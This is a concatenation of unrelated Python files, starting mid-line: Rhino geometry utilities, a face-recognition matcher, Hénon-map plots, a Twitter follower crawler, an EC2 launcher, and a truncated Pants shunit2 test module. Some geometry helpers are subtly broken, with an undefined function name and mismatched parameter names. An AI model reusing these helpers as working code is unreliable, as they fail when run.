= rc.Geometry.Line(endPt, accelEndPt) return sc.doc.Objects.AddLine(line1), sc.doc.Objects.AddLine(line2) def DotProduct(a, b): return a.X*b.X + a.Y*b.Y + a.Z*b.Z def VectorAngle(a, b): return math.acos(dotProduct(a,b) / (a.Length*b.Length)) def VectorLimit(vector, t): if vector.Length >= t: vector.Unitize() vector *= t return vector def RandomVector(size = 1): """Random 2d vector parameters: size(float)[optional]: length of return vector returns: Vector3d """ vec = rg.Vector3d(random.uniform(-1, 1), random.uniform(-1, 1), 0) vec.Unitize() vec *= size return vec def RandomVector3d(amp = None): """ returns random unitized vector if amp: returns vector of length amp """ vec = rg.Vector3d(random.uniform(-1,1), random.uniform(-1, 1), random.uniform(-1,1)) vec.Unitize() if amp:vec *= amp return vec def GetCornerVecs(pts, leftHanded = False, amplitude = 1): """ Returns the corner vector parameters: pts (Point3d)[list]: list of verticies leftHanded (bool, optional): if True, will get left hand side vecs amplitude (float, optional): amplitude of the returned vecs returns: Vector3d [list] """ def GetCornerVec(pt0, pt1, pt2): ang = util.AngleABC(pt0, pt1, pt2) vec0 = pt0-pt1 vec1 = pt2-pt1 vec0.Unitize() vec1.Unitize() cornerVec = (vec0 + vec1)/2 cornerVec.Unitize() if ang < 180: cornerVec.Reverse() return cornerVec cornerVecs = [] for i in range(len(pts)): vec = GetCornerVec(pts[(i-1)%len(pts)], pts[(i)%len(pts)], pts[(i+1)%len(pts)]) vec *= amplitude if leftHanded: vec.Reverse() cornerVecs.append(vec) return cornerVecs #Curves def SplitSelfIntersection(crv, safety = 0): """Splits curves into clockwise and counterclockwise loops at self intersection. parameters: crv: Closed planar curve returns: cw loops [list] cc loops [list] """ safety += 1 cwLoops = [] ccLoops = [] #Reparamterize newDomain = rg.Interval(0,1) crv.Domain = newDomain #Check for self intersection events = rg.Intersect.Intersection.CurveSelf(crv, sc.doc.ModelAbsoluteTolerance) #print "{} intersections".format(len(events)) #Collect intersection parameters parameters = [0] if len(events) > 0: for event in events: parameters.append(event.ParameterA) parameters.append(event.ParameterB) else: if crv.ClosedCurveOrientation() == rg.CurveOrientation.CounterClockwise: ccLoops = [crv] else: cwLoops = [crv] return cwLoops, ccLoops parameters.append(1) parameters.sort() #Split into segments segments = [] for i in range(len(parameters)-1): segments.append(crv.Trim(parameters[i], parameters[i+1])) #If segments are closed themselves, add to loop list segmentsToRemove = [] for segment in segments: if segment.IsClosed: if segment.ClosedCurveOrientation() == rg.CurveOrientation.CounterClockwise: ccLoops.append(segment) else: cwLoops.append(segment) segmentsToRemove.append(segment) for segment in segmentsToRemove: segments.remove(segment) #Join segments to make new loops newCrv = rg.PolyCurve() for segment in segments: newCrv.Append(segment) events = rg.Intersect.Intersection.CurveSelf(newCrv, sc.doc.ModelAbsoluteTolerance) if len(events) > 0 and safety < 10: #Enter recursion cwResults, ccResults = SplitSelfIntersection(newCrv, safety) for result in ccResults: ccLoops.append(result) for result in cwResults: cwLoops.append(result) else: if newCrv.ClosedCurveOrientation() == rg.CurveOrientation.CounterClockwise: ccLoops.append(newCrv) else: cwLoops.append(newCrv) return cwLoops, ccLoops def CustomOffset(crv, iter_d, rd): """ parameters: crv: Rhino curve inter_d (float): offset distance rd: rebuild distance returns: crv [list]: curves in same orientation as input crv """ n = int(crv.GetLength() / rd) if n < 3: n = 3 crv = crv.Rebuild(n, 3, True) params = crv.DivideByCount(n, False) newPts = [] for param in params: pt = crv.PointAt(param) tan = crv.TangentAt(param) tan.Rotate(math.radians(90), rg.Vector3d(0,0,1)) tan.Unitize() tan *= iter_d newPt = rg.Point3d.Add(pt, tan) newPts.append(newPt) newCrv = rg.NurbsCurve.Create(True, 3, newPts) cwCrvs, ccCrvs = SplitSelfIntersection(newCrv) if crv.ClosedCurveOrientation() == rg.CurveOrientation.Clockwise: return cwCrvs else: return ccCrvs #Geometry def Cone(pt, vec, range, radius): """arcPtVecInt(pt, vec, range) input: pt: center point of arc vec:(vector) direction of arc range:(float in degrees) Vision cone, aligned to vector radius: (float) radius return: rc arc """ perpVec = rc.Geometry.Vector3d(-vec.Y, vec.X, 0) plane = rc.Geometry.Plane(pt, vec, perpVec) plane.Rotate(math.pi, plane.Normal) circle = rc.Geometry.Circle(plane, radius) interval = rc.Geometry.Interval(math.pi+math.radians(range/2), math.pi-math.radians(range/2)) arc = rc.Geometry.Arc(circle, interval) line1 = rc.Geometry.LineCurve(pt, arc.StartPoint) line2 = rc.Geometry.LineCurve(arc.EndPoint, pt) polycurve = rc.Geometry.PolyCurve() polycurve.Append(arc) polycurve.Append(line2) polycurve.Append(line1) return polycurve def LineCurveLineCurveDistance(line1, line2): """ paremeters: crv1 (LineCurve): crv2 (LineCurve): returns: float: distance between two curves LineCurve: line between two closestPoints (if curves touching, returns True) """ result = rg.Intersect.Intersection.CurveCurve(crv1, crv2, sc.doc.ModelAbsoluteTolerance, sc.doc.ModelAbsoluteTolerance) if result.Count > 0: d = 0 line = result[0] else: crv1Pts = [crv1.PointAtStart, crv1.PointAtEnd] crv2Pts = [crv2.PointAtStart, crv2.PointAtEnd] closestDist = None closestCrv1Pt = None closestCrv2Pt = None for crv1Pt in crv1Pts: closestParamOnCrv2 = crv2.ClosestPoint(crv1Pt, 0) closestPtOnCrv2 = crv2.PointAt(closestParamOnCrv2[1]) dist = rs.Distance(crv1Pt, closestPtOnCrv2) if dist < closestDist or closestDist is None: closestDist = dist closestCrv1Pt = crv1Pt closestCrv2Pt = closestPtOnCrv2 for crv2Pt in crv2Pts: closestParamOnCrv1 = crv1.ClosestPoint(crv2Pt, 0) closestPtOnCrv1 = crv1.PointAt(closestParamOnCrv1[1]) dist = rs.Distance(crv2Pt, closestPtOnCrv1) if dist < closestDist or closestDist is None: closestDist = dist closestCrv1Pt = closestPtOnCrv1 closestCrv2Pt = crv2Pt d = closestDist line = rg.LineCurve(closestCrv1Pt, closestCrv2Pt) return d, line def IsCurveInsideCurve(plineCrv, testCrv): """IsCurveInsideCurve(plineCrv, testCrv) parameters: plineCrv (curve): closed polylineCurve testCrv (curve): curve to test if inside plineCrv returns: 0 - Outside 1 - Intersecting 2 - Inside """ result = rg.Intersect.Intersection.CurveCurve(plineCrv, testCrv, sc.doc.ModelAbsoluteTolerance, sc.doc.ModelAbsoluteTolerance) if len(result)>0: return 1 if plineCrv.Contains(testCrv.PointAtStart) == rg.PointContainment.Inside or plineCrv.Contains(testCrv.PointAtEnd) == rg.PointContainment.Inside: return 2 return 0 def main(): obj = rs.GetObject("Select Objects", preselect = True) obj = rs.coercecurve(obj) cw, cc = SplitSelfIntersection(obj) #bbox = minBoundingBox(obj) for crv in cw: sc.doc.Objects.AddCurve(crv) for crv in cc: sc.doc.Objects.AddCurve(crv) #Classes class Particle(): def __init__(self, pos = rg.Point3d(0,0,0), vel = rg.Vector3d(0,0,0)): self.pos = pos self.vel = vel self.acc = rg.Vector3d(0,0,0) self.id = None self.radius = 0 def Update(self): futurePos = rg.Point3d.Add(self.pos, self.vel) if futurePos.X < self.radius: self.vel.X *= -1 if futurePos.Y < self.radius: self.vel.Y *= -1 if futurePos.Z < self.radius: self.vel.Z *= -1 if futurePos.X > 100-self.radius: self.vel.X *= -1 if futurePos.Y > 100-self.radius: self.vel.Y *= -1 if futurePos.Z > 100-self.radius: self.vel.Z *= -1 self.vel += self.acc self.pos += self.vel def UpdateDisplay(self): if self.id:sc.doc.Objects.Delete(self.id, True) self.id = sc.doc.Objects.AddPoint(self.pos) if __name__ == "__main__": pts = [] for i in range(10): pts.append(RandomPoint()) mesh = DelaunayMesh(pts, rg.Plane.WorldXY) sc.doc.Objects.AddMesh(mesh)
from genericpath import exists from operator import mod import pickle from typing import List import colorama import face_recognition import os import cv2 from face_recognition.api import face_encodings, face_locations import json from picture import Picture from time import clock from colorama import Fore, Back, Style colorama.init(autoreset=True) KNOWN_FACES_DIR = "../known-images" LOADED_FACES_FILE = f"../loaded-faces.pickle" FACE_TO_MATCH = "../unknown-images/to_match.jpg" TOLERANCE = 0.6 FRAME_THICKNESS = 3 FONT_THICKNESS = 2 MODEL = "hog" # Could also be cnn def load_pictures_objects(pictures_path: str): pictures = [] for name in os.listdir(pictures_path): for filename in os.listdir(f"{pictures_path}/{name}"): relative_path = f'{pictures_path}/{name}/{filename}' print(f'loading {relative_path}') image = face_recognition.load_image_file(relative_path) locations = face_recognition.face_locations(image, model=MODEL) encodings = face_recognition.face_encodings(image, locations) pictures.append(Picture(relative_path, encodings, locations)) return pictures def serialize_pictures(pictures: List[Picture], fileToCreate: str): with open(fileToCreate, 'wb') as file: pickle.dump(pictures, file, protocol=pickle.HIGHEST_PROTOCOL) def deserialize_pictures(fileToRead): with open(fileToRead, "rb") as file: pictures = pickle.load(file) return pictures pictures = [] if exists(LOADED_FACES_FILE): print("Loading stored images...") pictures = deserialize_pictures(LOADED_FACES_FILE) else: print("Storing all images...") pictures = load_pictures_objects(KNOWN_FACES_DIR) serialize_pictures(pictures, LOADED_FACES_FILE) #known_locations = [] known_faces = [] known_names = [] for i in pictures: known_faces.append(i.encodings) known_names.append(i.name) print('done!') print("processing unknown face") #for filename in os.listdir(UNKNOWN_FACES_DIR): #print(filename) image = face_recognition.load_image_file(FACE_TO_MATCH) #locations = face_recognition.face_locations(image, model=MODEL) encoding = face_recognition.face_encodings(image)[0] for index, i in enumerate(pictures): #print(f"{index + 1}- comparing {FACE_TO_MATCH} with face(encoding) of {i.name}") #print(f"{i.name} has {len(i.encodings)} face(s)(encoding)") if len(i.encodings) == 0: print(f"Picture not found in {i.name}!") else: results = face_recognition.compare_faces(i.encodings, encoding, tolerance=TOLERANCE) image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) if True in results: #print(f"{i.name} has {len(i.encodings)} face(s)(encoding)") print(Fore.GREEN + f'{i.name} MATCH') #else: #print(Fore.RED + 'NOT A MATCH') #print('------------------------------------------') #print() #for face_encoding, face_location, in zip(encodings, locations): # results = face_recognition.compare_faces(known_faces, face_encoding, TOLERANCE) # print() # match = None # if True in results: # match = known_names[results.index(True)] # print(f"Match found: {match}") # top_left = (face_location[3], face_location[0]) # bottom_right = (face_location[1], face_location[2]) # color = [200, 162, 47] # cv2.rectangle(image, top_left, bottom_right, color, FRAME_THICKNESS) # top_left = (face_location[3], face_location[2]) # bottom_right = (face_location[1], face_location[2] + 22) # cv2.rectangle(image, top_left, bottom_right, color, cv2.FILLED) # cv2.putText(image, match, (face_location[3]+10, face_location[2]+15), cv2.FONT_HERSHEY_COMPLEX, 0.5, (200,200,200), FONT_THICKNESS) #cv2.imshow(filename, image) #cv2.waitKey(200000) #cv2.destroyWindow(filename)
import numpy as np from matplotlib.pyplot import figure, cm, show import full_henon as fh import helper as he def basin_attr(xVals, yVals, xSize, ySize, its=100, a=1.4, b=0.3): """ Function that creates the basin of attraction """ # Creating x and y starting values xRange = np.linspace(xVals[0], xVals[1], xSize) yRange = np.linspace(yVals[1], yVals[0], ySize) grid = np.zeros((ySize, xSize)) # Grid # Looping over all staring values for xInd, x0 in enumerate(xRange): for yInd, y0 in enumerate(yRange): xv, yv = fh.Henon(x0, y0, its, a, b, div=True, threshold=1e2) if xv != None: grid[yInd][xInd] += 1 return grid def plot_basin(saveFig=None): """ Function that plots the basin of attraction. """ # Values for creating the grid and plot xVals = (-2, 2) # Range of x values yVals = (-3, 5) # Range of y values xSize = 2048 # Number of x pixels ySize = 1080 # Number of y pixels numb = 5 # Number of x and y ticks for the plot # Axes labels and ticks xLabels = np.linspace(xVals[0], xVals[1], numb).astype(int) yLabels = np.linspace(yVals[0], yVals[1], numb).astype(int) xLocs = np.linspace(0, xSize, numb) yLocs = np.linspace(ySize, 0, numb) # Finding the trapping region trappingRegion = basin_attr(xVals, yVals, xSize, ySize, its=25) # Plotting fig = figure(figsize=(15,8)) frame = fig.add_subplot(1,1,1) frame.imshow(trappingRegion, cmap=cm.binary) # Axes labeling and ticks frame.set_xlabel(r"$x_0$", fontsize=20) frame.set_ylabel(r"$y_0$", fontsize=20) frame.set_xticks(xLocs) frame.set_yticks(yLocs) frame.set_xticklabels(xLabels, fontsize=15) frame.set_yticklabels(yLabels, fontsize=15) if saveFig != None: fig.savefig(saveFig) else: show() def trapp_region(saveFig=None, output=False): """ Function that plots the trapping region of the Hénon map """ # Vertices (see Peitgens et al.) P1 = (-1.33, 0.42) P2 = (1.32, 0.133) P3 = (1.245, -0.14) P4 = (-1.06, -0.5) # Creating the lines Vert1 = he.Create_Line(P1, P2) Vert2 = he.Create_Line(P2, P3) Vert3 = he.Create_Line(P3, P4) Vert4 = he.Create_Line(P4, P1) # Combining the points and vertices in lists ps = [P1, P2, P3, P4] vs = [Vert1, Vert2, Vert3, Vert4] if output: return ps, vs # Generating points of the Hénon map xv, yv = fh.Henon(0, 0, int(1e4), 1.4, 0.3) # Plotting fig = figure(figsize=(10,8)) frame = fig.add_subplot(1,1,1) frame.scatter(xv, yv, s=0.01, label='points', color='darkblue', marker='.') for i in range(len(ps)): frame.scatter(ps[i][0], ps[i][1], color='crimson', marker='o', s=50) frame.plot(vs[i][0], vs[i][1], color='seagreen', linestyle='--', lw=1.8) frame.set_xlabel("x", fontsize=20) frame.set_ylabel("y", fontsize=20) frame.grid() if saveFig != None: fig.savefig(saveFig) else: show() def plot_n_img(n_start=0, n_end=8, output=False, plot=True, saveFig=None, color=['indigo'], lw=[1], av1=1.4, bv1=0.3): """ Function that creates the image of a geometrical shape using the Hénon map. The initial vertices of the geometric shape are given by the input parameter 'init_vert'. This function is able to generate multiple images based on the initial input. This implies that the Hénon map will be applied multiple times to the initial conditions based on the input. 'n_start' gives the lowest order image. So n_start=0 is the image obtained after the map has acted on it once; 'n_end' gives the highest order image. It is possible to select which output is desirable, either a list containing all images or a plot showing the images or both. Input: n_start = lowest order image (integer); n_end = highest order image (integer); output = whether or not the boundaries in a list are the output (Boolean); plot = whether or not a plot has to be made (Boolean); saveFig = if the figure has to be saved (None or string); color = color of the images (list); lw = line widths of the different images (list); av1 = a parameter of the Hénon map (float); bv1 = b parameter of the Hénon map (float); Returns: optional: all_bounds = list containing the images (list). """ # Starting values j = 0 points, vert = trapp_region(output=True) count = 0 # Empty list to put the boundaries in if output: all_bounds = [] # Initializing the plot fig = figure(figsize=(15,8)) frame = fig.add_subplot(1,1,1) for ind, v in enumerate(vert): frame.scatter(points[ind][0], points[ind][1], color='crimson', marker='o', s=65, zorder=3) frame.plot(v[0], v[1], color='seagreen', linestyle='--', lw=2) # Looping while j <= n_end: bounds = he.image_func(vert, av1, bv1) # Checking if the values need to be added to the boundaries if j >= n_start and j <= n_end: if output: all_bounds.append(bounds) for ind, b in enumerate(bounds): if ind == 0: frame.plot(b[0], b[1], label=f"Image {j+1}", zorder=3-j/10, color=color[count], lw=lw[count]) else: frame.plot(b[0], b[1], color=color[count], lw=lw[count]) count += 1 # New conditions for the next loop vert = bounds j += 1 # Finishing the plot frame.set_xlabel(r"$x$", fontsize=20) frame.set_ylabel(r"$y$", fontsize=20) frame.tick_params(axis="both", labelsize=15) frame.legend(fontsize=20) frame.grid() if saveFig != None: fig.savefig(str(saveFig)) elif plot: show() elif output: return all_bounds
import twitter import sys import json import time import networkx import operator import pickle from pathlib import Path import matplotlib.pyplot as plt def oauth_login(): # XXX: Go to http://twitter.com/apps/new to create an app and get values # for these credentials that you'll need to provide in place of these # empty string values that are defined as placeholders. # See https://dev.twitter.com/docs/auth/oauth for more information # on Twitter's OAuth implementation. CONSUMER_KEY = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX' CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXX' OAUTH_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXX' OAUTH_TOKEN_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXX' auth = twitter.oauth.OAuth(OAUTH_TOKEN, OAUTH_TOKEN_SECRET, CONSUMER_KEY, CONSUMER_SECRET) twitter_api = twitter.Twitter(auth=auth) return twitter_api twitter_api = oauth_login() def parsedUserShow(ID): parsedUserShowDB = {} my_file = Path("parsedUserShowDB.txt") if my_file.is_file(): with open("parsedUserShowDB.txt", "rb") as f: try: parsedUserShowDB = pickle.load(f) except EOFError: print("EOF Error, initializing empty DB") if ID in parsedUserShowDB: return parsedUserShowDB[ID] else: #Should always be true when user not yet in DB UserResponseShow = twitter_api.users.show(user_id = ID) UserDumps = json.dumps(UserResponseShow, indent=1) UserResponseParsed = json.loads(UserDumps) #This is the User Data Dictionary parsedUserShowDB[ID] = UserResponseParsed with open("parsedUserShowDB.txt", "wb") as f: pickle.dump(parsedUserShowDB, f) return UserResponseParsed # type dict #End of parsedUserShow def top5(reciprocals_dict): top5Dict = {} #If there are 5 or less reciprocals the top 5 will be all of the reciprocals if(len(reciprocals_dict) <= 5 ): top5Dict = reciprocals_dict else: #figure out which of the 5 reciprocals have the most followers reciprocalsSorted = ( sorted( reciprocals_dict.items(), key=operator.itemgetter(1) ) ) # List of tuples sorted by follower count reciprocalsSorted.reverse() # We get the list sorted in ascending order but want it in descending so we can chose the first 5 #First 5 pairs will be the top 5 for i in range(5): id = reciprocalsSorted[i][0] followerCount = reciprocalsSorted[i][1] top5Dict.update({id : followerCount}) return top5Dict def dictionaryOfReciprocals(reciprocals_set): reciprocalsDict = {} for i in reciprocals_set: reciprocalData = parsedUserShow(i) reciprocalID = reciprocalData['id'] reciprocalFollowersCount = reciprocalData['followers_count'] reciprocalPair = {reciprocalID : reciprocalFollowersCount} reciprocalsDict.update(reciprocalPair) return reciprocalsDict class socialNode(): #Instance variables #twitter_id = 0 #twitter_handle = "NONE" #number_of_followers = 0 #list_of_friends = [] Will be list of all friends as returned from Twitter API #dict_of_reciprocals = () dictionary of reciprocals #top_5 = {} # Will be a dictonary of the 5 reciprocals with most followers, 'id': number_of_followers def __init__(self, *args, twitter_id = 0, twitter_handle = "NONE"): my_file = Path("SocialNodesDB.txt") if my_file.is_file(): with open("SocialNodesDB.txt", "rb") as f: try: SocialNodesDB = pickle.load(f) except EOFError: print("EOF Error, initializing empty DB") SocialNodesDB = {} else: with open("SocialNodesDB.txt", "wb") as f: SocialNodesDB = {} pickle.dump(SocialNodesDB, f) if(twitter_id in SocialNodesDB):# In case we have seen this user node before and have it cached socialNodeDict = SocialNodesDB[twitter_id] #print(SocialNodesDB) UserResponseParsed = socialNodeDict["UserResponseParsed"] #Instantiates class variables on user data #TO-DO IMPLEMENT CACHE TO CACHE ALL THIS DATA self.twitter_id = UserResponseParsed['id'] #int self.twitter_handle = UserResponseParsed['screen_name'] # string self.number_of_followers = UserResponseParsed['followers_count'] # int self.list_of_followers = socialNodeDict["list_of_followers"] # list self.list_of_friends = socialNodeDict["list_of_friends"] self.dict_of_reciprocals = dictionaryOfReciprocals(set(self.list_of_followers) & set(self.list_of_friends)) # dictionary of a set of reciprocals self.top5 = top5(self.dict_of_reciprocals) # dict { id : followerCount } #socialNodeInfo = {"UserResponseParsed" : UserResponseParsed, "list_of_followers" : self.list_of_followers, # "list_of_friends" : self.list_of_friends} else: # In case the user is new UserResponseParsed = parsedUserShow(twitter_id) #Instantiates class variables on user data self.twitter_id = UserResponseParsed['id'] #int self.twitter_handle = UserResponseParsed['screen_name'] # string self.number_of_followers = UserResponseParsed['followers_count'] # int self.list_of_followers = json.loads( json.dumps( twitter_api.followers.ids(user_id = self.twitter_id, count = 5000), indent = 1 ) )['ids'] # list self.list_of_friends = json.loads( json.dumps(twitter_api.friends.ids(user_id = self.twitter_id, count = 5000), indent = 1 ) )['ids'] # list self.dict_of_reciprocals = dictionaryOfReciprocals(set(self.list_of_followers) & set(self.list_of_friends)) # dictionary of a set of reciprocals self.top5 = top5(self.dict_of_reciprocals) # dict { id : followerCount } socialNodeDict = {"UserResponseParsed" : UserResponseParsed, "list_of_followers" : self.list_of_followers, "list_of_friends" : self.list_of_friends} SocialNodesDB[self.twitter_id] = socialNodeDict with open("SocialNodesDB.txt", "wb") as f: pickle.dump(SocialNodesDB, f) #End of Init #This will return a graph with our node in the middle and edges to the top 5 def top5Graph(originalNode): top5Dict = originalNode.top5 top5Graph = networkx.Graph() originalNodeID = originalNode.twitter_id top5Graph.add_node(originalNodeID) for ID in top5Dict: top5Graph.add_node(ID) top5Graph.add_edge(originalNodeID, ID) return top5Graph #This class is made to handle the Graph portion so it should not call the twitter API class socialNetwork(): #networkGraph = networkx.Graph() #initialNode = socialNode() def __init__(self, initialNode): #Instantiates initialNode self.initialNode = initialNode self.initialNodeID = initialNode.twitter_id self.visited = [] # This is not the id's of nodes in the graph, its the ID's of the nodes that we have already fetched the Top 5 for #Creates graph self.networkGraph = networkx.Graph() #Utilizing gpickle to save time in future runs self.gpickleFileName = str(self.initialNodeID) + ".gpickle" if(Path(self.gpickleFileName).is_file()): self.networkGraph = networkx.read_gpickle(self.gpickleFileName) print("Loaded pickle graph save with " + str(self.networkGraph.number_of_nodes())+ " nodes") #Saving visited try: with open((str(self.initialNodeID) + '.txt'), 'rb') as f: self.visited = pickle.load(f) except: with open((str(self.initialNodeID) + '.txt'), 'wb') as f: pickle.dump(self.visited, f) print("Loaded pickle visited list with " + str(len(self.visited)) + " visited nodes") else: # Adds initial node to graph self.networkGraph.add_node(self.initialNodeID) def returnDiameter(self): return networkx.diameter(self.networkGraph) def returnAverageDistance(self): return networkx.average_shortest_path_length(self.networkGraph) # size and node must be passed as parameters # this is the crawler def expandNetwork(self, **kwargs): #Here is where we populate the graph with the top 5 of the top 5 until we reach around the size we want bfs_edges = networkx.bfs_edges(self.networkGraph, self.initialNodeID) bfs_edges_list = list(bfs_edges) print(bfs_edges_list) #Terminating recursion case, since our graph size is constant in all iterations we are checking # the correct size, we'll endup with around 25 more nodes than askes while(self.networkGraph.number_of_nodes() < kwargs['size']): if((len(self.visited) > 0 and bfs_edges == 0)): print("Problem") break selectedNode = self.initialNode selectedNodeID = selectedNode.twitter_id #Determine next node via BFS bfs_edges = networkx.bfs_edges(self.networkGraph, self.initialNodeID) bfs_edges_list = list(bfs_edges) if(int(self.networkGraph.number_of_nodes()) != 0): #Always true except for first node for edge in bfs_edges_list: #if node not in graph, that is selected node endingNodeID = edge[1] if(endingNodeID not in self.visited): try: selectedNode = socialNode(twitter_id = endingNodeID) selectedNodeID = selectedNode.twitter_id except: #This is normally triggered when the user has their profile set to private "not authorized" error print("Could not use node " + str(endingNodeID) + " probably has profile set to private") selectedNodeID = endingNodeID break #To prevent double entries if(selectedNodeID not in self.visited): self.visited.append(selectedNodeID) #Get a graph from selected node, initially our first node, max of 5 nodes selectedTop5Graph = top5Graph(selectedNode) # Add top 5 graph of selected node to our graph self.networkGraph = networkx.compose(self.networkGraph, selectedTop5Graph) print(selectedNodeID) print(self.networkGraph.number_of_nodes()) #Writes to pickle to save time in future runs networkx.write_gpickle(self.networkGraph, self.gpickleFileName) with open((str(self.initialNodeID) + '.txt'), 'wb') as f: pickle.dump(self.visited, f) time.sleep(2) #end of while loop #self.expandNetwork(size = kwargs['size']) #end of expandNetwork #THIS SHOULD NOT BE RECURSION def networkDraw(self): networkx.draw(self.networkGraph, with_labels=True, font_weight="bold") plt.show() if __name__ == '__main__': print('THIS SHOULD NOT BE MAIN AND DOES NOTHING, ITS A MODULE TO IMPORT TO MAIN MODULE')
import time import boto3 from collections import defaultdict region = 'us-east-1' ami = 'ami-0fe23c115c3ba9bac' # region = 'us-west-2' # ami = 'ami-01bbe152bf19d0289' ec2 = boto3.resource('ec2', region_name=region) instance = ec2.create_instances( ImageId=ami, IamInstanceProfile={ 'Name': 'sandbox-ec2-assume-role', }, MinCount=1, MaxCount=1, SecurityGroupIds=['sg-065521436b78e83ba'], KeyName='sandbox', InstanceType='t2.micro' ) time.sleep(5) # Get information for all running instances instance_status = ec2.instances.filter(Filters=[{ 'Name': 'instance-state-name', 'Values': ['pending']}]) ec2info = defaultdict() for instance in instance_status: ec2info[instance.id] = { 'Type': instance.instance_type, 'ID': instance.id, 'Private IP': instance.private_ip_address, 'Public IP': instance.public_ip_address, 'State': instance.state['Name'], } attributes = ['Type', 'ID', 'Private IP', 'Public IP', 'State'] for instance_id, instance in ec2info.items(): for key in attributes: print("{0}: {1}".format(key, instance[key])) print("-------------------------")
print("Criando um novo arquivo pelo GitHub e usando o git pull para puxar")
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). from __future__ import annotations from textwrap import dedent import pytest from pants.backend.python.goals import package_pex_binary from pants.backend.python.target_types import PexBinary, PythonSourcesGeneratorTarget from pants.backend.python.target_types_rules import rules as python_target_type_rules from pants.backend.python.util_rules import pex_from_targets from pants.backend.shell import shunit2_test_runner from pants.backend.shell.shunit2_test_runner import ( Shunit2FieldSet, Shunit2Runner, Shunit2RunnerRequest, Shunit2TestRequest, ) from pants.backend.shell.target_types import ( ShellSourceTarget, Shunit2Shell, Shunit2ShellField, Shunit2TestsGeneratorTarget, ) from pants.backend.shell.target_types import rules as target_types_rules from pants.core.goals.test import ( TestDebugRequest, TestResult, build_runtime_package_dependencies, get_filtered_environment, ) from pants.core.util_rules import source_files from pants.engine.addresses import Address from pants.engine.fs import FileContent from pants.engine.internals.scheduler import ExecutionError from pants.engine.target import Target from pants.testutil.python_rule_runner import PythonRuleRunner from pants.testutil.rule_runner import QueryRule, mock_console @pytest.fixture def rule_runner() -> PythonRuleRunner: return PythonRuleRunner( rules=[ *shunit2_test_runner.rules(), *source_files.rules(), *pex_from_targets.rules(), *package_pex_binary.rules(), *python_target_type_rules(), *target_types_rules(), build_runtime_package_dependencies, get_filtered_environment, QueryRule(TestResult, [Shunit2TestRequest.Batch]), QueryRule(TestDebugRequest, [Shunit2TestRequest.Batch]), QueryRule(Shunit2Runner, [Shunit2RunnerRequest]), ], target_types=[ ShellSourceTarget, Shunit2TestsGeneratorTarget, PythonSourcesGeneratorTarget, PexBinary, ], ) GOOD_TEST = dedent( """\ #!/usr/bin/bash testEquality() { assertEquals 1 1 } """ ) def run_shunit2( rule_runner: PythonRuleRunner, test_target: Target, *, extra_args: list[str] | None = None, env: dict[str, str] | None = None, ) -> TestResult: rule_runner.set_options( [ "--backend-packages=pants.backend.shell", *(extra_args or ()), ], env=env, env_inherit={"PATH", "PYENV_ROOT", "HOME"}, ) input: Shunit2TestRequest.Batch = Shunit2TestRequest.Batch( "", (Shunit2FieldSet.create(test_target),), None ) test_result = rule_runner.request(TestResult, [input]) debug_request = rule_runner.request(TestDebugRequest, [input]) if debug_request.process is not None: with mock_console(rule_runner.options_bootstrapper): debug_result = rule_runner.run_interactive_process(debug_request.process) assert test_result.exit_code == debug_result.exit_code return test_result def test_passing(rule_runner: PythonRuleRunner) -> None: rule_runner.write_files({"tests.sh": GOOD_TEST, "BUILD": "shunit2_tests(name='t')"}) tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="tests.sh")) result = run_shunit2(rule_runner, tgt) assert result.exit_code == 0 assert "Ran 1 test.\n\nOK" in result.stdout def test_failing(rule_runner: PythonRuleRunner) -> None: rule_runner.write_files( { "tests.sh": dedent( """\ #!/usr/bin/bash testEquality() { assertEquals 1 5 } """ ), "BUILD": "shunit2_tests(name='t')", } ) tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="tests.sh")) result = run_shunit2(rule_runner, tgt) assert result.exit_code == 1 assert "Ran 1 test.\n\nFAILED" in result.stdout def test_dependencies(rule_runner: PythonRuleRunner) -> None: """Ensure direct and transitive dependencies work.""" rule_runner.write_files( { "transitive.sh": dedent( """\ add_one() { echo $(($1 + 1)) } """ ), "direct.sh": dedent( """\ source transitive.sh add_two() { echo $(($(add_one $1) + 1)) } """ ), "tests.sh": dedent( """\ #!/usr/bin/bash source direct.sh testAdd() { assertEquals $(add_two 2) 4 } """ ), "BUILD": dedent( """\ shunit2_tests(name="t", dependencies=[':direct']) shell_source(name="direct", source='direct.sh', dependencies=[':transitive']) shell_source(name="transitive", source='transitive.sh') """ ), } ) tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="tests.sh")) result = run_shunit2(rule_runner, tgt) assert result.exit_code == 0 assert "Ran 1 test.\n\nOK" in result.stdout def test_subdirectories(rule_runner: PythonRuleRunner) -> None: # We always download the shunit2 script to the build root - this test is a smoke screen that # we properly source the file. rule_runner.write_files({"a/b/c/tests.sh": GOOD_TEST, "a/b/c/BUILD": "shunit2_tests()"}) tgt = rule_runner.get_target(Address("a/b/c", relative_file_path="tests.sh")) result = run_shunit2(rule_runner, tgt) assert result.exit_code == 0 assert "Ran 1 test.\n\nOK" in result.stdout @pytest.mark.skip( "TODO: figure out why the rule is getting memoized but that doesn't happen with Pytest." "The Process is not being cached, but the rule invocation is being memoized so the " "`--force` does not work properly." ) @pytest.mark.no_error_if_skipped def test_force(rule_runner: PythonRuleRunner) -> None: rule_runner.write_files({"tests.sh": GOOD_TEST, "BUILD": "shunit2_tests(name='t')"}) tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="tests.sh")) # Should not receive a memoized result if force=True. result_one = run_shunit2(rule_runner, tgt, extra_args=["--test-force"]) result_two = run_shunit2(rule_runner, tgt, extra_args=["--test-force"]) assert result_one.exit_code == 0 assert result_two.exit_code == 0 assert result_one is not result_two # But should if force=False. result_one = run_shunit2(rule_runner, tgt) result_two = run_shunit2(rule_runner, tgt) assert result_one.exit_code == 0 assert result_one is result_two def test_extra_env_vars(rule_runner: PythonRuleRunner) -> None: rule_runner.write_files( { "tests.sh": dedent( """\ #!/usr/bin/bash testEnv() { assertEquals "${SOME_VAR}" some_value assertEquals "${OTHER_VAR}" other_value } """ ), "BUILD": "shunit2_tests(name='t')", } ) tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="tests.sh")) result = run_shunit2( rule_runner, tgt, 